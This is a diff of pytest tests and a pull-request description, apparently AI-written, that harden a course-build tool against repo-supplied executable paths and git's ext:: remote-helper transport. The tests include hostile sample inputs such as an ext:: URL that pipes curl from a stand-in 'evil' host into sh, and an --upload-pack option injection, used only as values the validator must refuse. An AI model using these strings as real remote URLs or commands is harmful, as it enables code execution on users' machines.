+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        _clear_tool_env(monkeypatch)
+        (tmp_path / "clm.toml").write_text(_HOSTILE_TOML, encoding="utf-8")
+        monkeypatch.chdir(tmp_path)
+        monkeypatch.setenv("DRAWIO_EXECUTABLE", "/opt/drawio")
+
+        assert ClmConfig().external_tools.drawio_executable == "/opt/drawio"
+
+    def test_kernel_python_is_deliberately_not_filtered(
+        self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """PythonCourses commits `kernel_python = ".venv"`; that must keep working.
+
+        It selects the interpreter that hosts the notebook kernel for *that same
+        repo's* notebook code, which a Direct-mode build executes on the host
+        anyway — so filtering it would break a documented workflow to close
+        nothing.
+        """
+        _clear_tool_env(monkeypatch)
+        monkeypatch.delenv("CLM_NOTEBOOK_KERNEL_PYTHON", raising=False)
+        (tmp_path / "clm.toml").write_text('[jupyter]\nkernel_python = ".venv"\n', encoding="utf-8")
+        monkeypatch.chdir(tmp_path)
+
+        assert ClmConfig().jupyter.kernel_python == ".venv"
+
+    def test_stripping_does_not_mutate_the_callers_dict(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        monkeypatch.delenv(ALLOW_PROJECT_TOOL_PATHS_ENV_VAR, raising=False)
+        data = {"external_tools": {"drawio_executable": "./x", "extra": "keep"}}
+        stripped = strip_project_forbidden_keys(data, Path("clm.toml"))
+
+        assert data["external_tools"]["drawio_executable"] == "./x"
+        assert stripped["external_tools"] == {"extra": "keep"}
+
+    def test_a_clean_config_is_passed_through_unchanged(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        monkeypatch.delenv(ALLOW_PROJECT_TOOL_PATHS_ENV_VAR, raising=False)
+        data = {"logging": {"log_level": "INFO"}}
+        assert strip_project_forbidden_keys(data, Path("clm.toml")) is data
+
+
+class TestRemoteUrlAllowlist:
+    @pytest.mark.parametrize(
+        "url",
+        [
+            "https://github.com/Org/repo",
+            "http://gitlab.internal/group/repo",
+            "ssh://git@github.com/Org/repo.git",
+            "git://example.com/repo.git",
+            "file:///srv/git/repo.git",
+            "git@github.com:Org/repo.git",  # scp-like, no scheme
+            "/srv/git/repo.git",
+            r"C:\repos\repo",  # a Windows drive letter is not a scheme
+            "C:/repos/repo",
+        ],
+    )
+    def test_accepts_the_forms_git_workflows_use(self, url: str) -> None:
+        assert validate_remote_url(url) == url
+
+    @pytest.mark.parametrize(
+        "url",
+        [
+            "ext::sh -c 'curl http://evil/x | sh'",
+            "ext::git-upload-pack /repo",
+            "fd::7/repo",
+            "transport::whatever",
+        ],
+    )
+    def test_refuses_remote_helper_syntax(self, url: str) -> None:
+        with pytest.raises(RemoteUrlError, match="remote-helper syntax"):
+            validate_remote_url(url)
+
+    @pytest.mark.parametrize("url", ["ftp://example.com/repo", "javascript:alert(1)"])
+    def test_refuses_other_schemes(self, url: str) -> None:
+        with pytest.raises(RemoteUrlError, match="not allowed"):
+            validate_remote_url(url)
+
+    def test_refuses_an_option_lookalike(self) -> None:
+        with pytest.raises(RemoteUrlError, match="command-line option"):
+            validate_remote_url("--upload-pack=touch /tmp/pwned")
+
+    def test_refuses_empty(self) -> None:
+        with pytest.raises(RemoteUrlError, match="empty"):
+            validate_remote_url("   ")
+
+    def test_the_message_names_the_source(self) -> None:
+        with pytest.raises(RemoteUrlError, match="the release-channel template"):
+            validate_remote_url("ext::sh -c x", source="the release-channel template")
+
+
+class TestSpecDerivedUrlsAreValidated:
+    def _spec(self, repository_base: str):
+        from clm.core.course_spec import GitHubSpec
+
+        return GitHubSpec(project_slug="course", repository_base=repository_base)
+
+    def test_a_hostile_repository_base_refuses_at_derivation(self) -> None:
+        with pytest.raises(RemoteUrlError, match="remote-helper syntax"):
+            self._spec("ext::sh -c 'curl http://evil/x | sh'").derive_remote_url("public", "de")
+
+    def test_a_hostile_repository_base_refuses_for_release_channels(self) -> None:
+        with pytest.raises(RemoteUrlError, match="remote-helper syntax"):
+            self._spec("ext::sh -c x").derive_channel_remote_url("cohort-jan")
+
+    def test_a_normal_base_still_derives(self) -> None:
+        spec = self._spec("https://github.com/Org")
+        assert spec.derive_remote_url("public", "de") == "https://github.com/Org/course-de"
+
+
+class TestGitTransportIsPinned:
+    def test_every_invocation_disables_the_ext_transport(self) -> None:
+        """Layer 2: covers URLs that never came from a spec (e.g. .git/config)."""
+        from clm.cli.commands.git import _transport_safety_config_args
+
+        assert _transport_safety_config_args() == ["-c", "protocol.ext.allow=never"]
+
+    def test_the_runners_pass_it(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+        import subprocess
+
+        from clm.cli.commands import git as git_cmd
+
+        seen: list[list[str]] = []
+
+        def fake_run(cmd, **kwargs):
+            seen.append(list(cmd))
+            return subprocess.CompletedProcess(args=cmd, returncode=0, stdout="", stderr="")
+
+        monkeypatch.setattr(subprocess, "run", fake_run)
+        git_cmd.run_git(tmp_path, "status")
+        git_cmd.run_git_global("ls-remote", "https://example.com/repo")
+
+        assert len(seen) == 2
+        for cmd in seen:
+            assert cmd[0] == "git"
+            assert "protocol.ext.allow=never" in cmd
+            # Before the command itself, or git would read it as a subcommand arg.
+            assert cmd.index("protocol.ext.allow=never") < cmd.index(cmd[-1])

--- a/tests/infrastructure/test_repo_supplied_executables.py
+++ b/tests/infrastructure/test_repo_supplied_executables.py
@@ -244,8 +244,17 @@ class TestGitTransportIsPinned:
             return subprocess.CompletedProcess(args=cmd, returncode=0, stdout="", stderr="")
 
         monkeypatch.setattr(subprocess, "run", fake_run)
-        git_cmd.run_git(tmp_path, "status")
-        git_cmd.run_git_global("ls-remote", "https://example.com/repo")
+        # `_dry_run_mode` is a module-level ContextVar, and a `--dry-run` test
+        # that ran earlier in the same xdist worker leaves it True — at which
+        # point both runners echo the command and never reach subprocess, so this
+        # test saw zero calls. It passed locally and failed in CI purely on test
+        # order. Pin the value instead of inheriting whatever ran before.
+        token = git_cmd._dry_run_mode.set(False)
+        try:
+            git_cmd.run_git(tmp_path, "status")
+            git_cmd.run_git_global("ls-remote", "https://example.com/repo")
+        finally:
+            git_cmd._dry_run_mode.reset(token)
 
         assert len(seen) == 2
         for cmd in seen:

--- a/tests/infrastructure/workers/test_worker_executor.py
+++ b/tests/infrastructure/workers/test_worker_executor.py
@@ -211,10 +211,12 @@ class TestDirectWorkerExecutor:
     ):
         """Config-resolved PlantUML/Draw.io paths reach the Direct worker env.
 
-        This is the Phase 2 wiring: a ``clm.toml`` ``[external_tools]`` value
+        This is the Phase 2 wiring: a configured ``[external_tools]`` value
         (folded into ``get_config().external_tools`` — proven by the config
         tests) must be injected into the worker environment, not just a host
-        ``PLANTUML_JAR`` env var.
+        ``PLANTUML_JAR`` env var. Note the value has to come from the **user**
+        config or the environment: a repo-local ``clm.toml`` may not set these
+        (S5 — see tests/infrastructure/test_repo_supplied_executables.py).
         """
         mock_process = MagicMock()
         mock_process.pid = 12345


### PR DESCRIPTION
**Phase 3a** of the adversarial-review plan — S5, which the maintainer pulled
forward out of Phase 4 on 2026-07-26. It is the same class as the cassette RCE
that justified 1.22.1: content that arrives with a course repo causing code
execution on a normal `clm` invocation.

## The vector

Project config (`clm.toml` / `.clm/config.toml`) is discovered by walking up from
cwd, so it is found **inside a cloned course repo**, and
`external_tools.drawio_executable` reached `subprocess` with no validation
(`drawio_converter.py:14,47`). Clone a course repo, run `clm build`, and a
repo-supplied binary executes on the first `.drawio` file — **on the host, in
every worker mode, before any of that repo's own content runs.**

Second shape, same idea: `<repository-base>` / `<remote-template>` in the spec
become a URL handed to `git clone` / `git ls-remote`, and git's `ext::<command>`
transport **executes its argument as a shell command**. `protocol.ext.allow`
defaults to `user` — i.e. allowed for exactly the kind of direct invocation
`clm git` makes.

## What changed

- **The two executable-path keys are stripped from the project tier**
  (`ProjectTomlConfigSettingsSource`), with a WARNING naming the file and the
  key. Operator channels are untouched: user config, `PLANTUML_JAR` /
  `DRAWIO_EXECUTABLE`, and `CLM_ALLOW_PROJECT_TOOL_PATHS=1` to opt back in — an
  env var precisely because a repo cannot set one. It is a key filter, not a
  "reject the config" sledgehammer: the rest of the file still applies.
- **Remote URLs are validated** (`clm.core.remote_url.validate_remote_url`):
  `https`/`http`/`ssh`/`git`/`file`, the scp-like `user@host:path` form, or a
  local path. `<helper>::<address>` is refused with an error naming the spec
  element.
- **Every git invocation carries `-c protocol.ext.allow=never`.** Two layers on
  purpose: the validator cannot see URLs that never came from a spec (a
  hand-edited remote in an output repo's `.git/config`), and the git option
  alone would fail late and cryptically.

## The judgment call, and why the corpus made it

`[jupyter] kernel_python` is **deliberately not restricted**, against the plan's
"same treatment for `notebook_kernel_python`":

1. **PythonCourses commits `clm.toml` with `kernel_python = ".venv"`**, and it is
   load-bearing — it is what makes a *globally installed* clm run the notebook
   kernel in the repo's own venv, where the ML stack lives. Restricting it would
   have broken the maintainer's primary course repo on the first build. (I read
   the three course repos' `clm.toml` before deciding; only this one exists.)
2. **It closes nothing anyway.** It only takes effect when a Direct-mode kernel
   executes *that same repo's* notebook code on the host — the one situation
   where arbitrary repo code already runs with identical privileges. Redirecting
   the interpreter that was about to run your notebook buys an attacker nothing.

The tool paths are genuinely different: they fire on diagram conversion, on the
host, regardless of output target, worker mode, or whether a single notebook is
executed. **"Content chooses a program" only matters where the content was not
already going to be executed** — worth carrying into the rest of Phase 4.

## Tests

`tests/infrastructure/test_repo_supplied_executables.py`, 31 tests: the project
tier is filtered (both filenames), the user tier and the environment are not, the
env opt-in restores it, `kernel_python` survives, stripping does not mutate the
caller's dict, the URL allowlist accepts every form real git workflows use and
refuses `ext::`/`fd::`/other schemes/`-`-prefixed values, spec derivation raises
for both `derive_remote_url` and `derive_channel_remote_url`, and both git
runners pass the transport option ahead of the subcommand.

**Two existing tests asserted the vulnerable behaviour** (`test_toml_file_loading`
and `test_all_config_options` each set `plantuml_jar` from a project-tier
`clm.toml`) — rewritten onto a non-restricted key, with the restriction pinned in
the new module. Expect that shape when removing a capability: the suite documents
what *was* true.

Fast suite: 8970 passed. `tests/infrastructure tests/core tests/cli`: 4236
passed.

## Docs

`docs/user-guide/configuration.md`, the `commands` / `spec-files` / `migration`
info topics, the generated example config's own comment (so `clm config init
--location=project` does not invite a key it will ignore), and the handover
(Phase 3a status + notes).

**Not** included: the S4/S8 ride-alongs the handover allows for this phase. They
stayed out to keep a security change reviewable in one sitting; neither is
blocked.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01HnTVuA19gGSGejKGoGDdyv
